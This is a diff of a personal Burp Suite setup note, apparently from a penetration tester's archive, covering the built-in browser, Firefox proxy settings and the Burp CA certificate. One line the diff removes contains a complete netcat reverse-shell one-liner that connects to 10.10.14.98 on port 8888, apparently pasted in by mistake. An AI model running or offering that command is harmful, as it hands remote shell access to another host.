7RU7H/Archive/Tools/Web-Applications-Attacking/Burpsuite/BurpSuite.md

 - Builtin Browser, never setup the burp certificate with your own browser every again!
 Go to `Project settings -> no sandbox for builtin browser`

-## FoxyProxy/Firefox proxy
+## FoxyProxy / Firefox proxy

 Firefox menu -> Settings -> Network Settings click Settings Select manual proxy configuration:
 	HTTP proxy: 127.0.0.1 8080
 	uncheck: Also use this proxy for FTP and HTTPS
-	delete: ANYTHING in the "No proxy for" field rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.98 8888 >/tmp/f
+	delete: ANYTHING in the "No proxy for" field

 ## Burp Suite CA

-To intercept and analyze HTTPS traffic, BS has Certificate Authority and uses it to issue on-th-fly certifactes for each website that we visit and pass through Burp.
+To intercept and analyse HTTPS traffic, BS has Certificate Authority and uses it to issue on-th-fly certificates for each website that we visit and pass through Burp.

 http://burp -> CA Certificate
 save the file cacert.der to `/home/<user>/Downloads`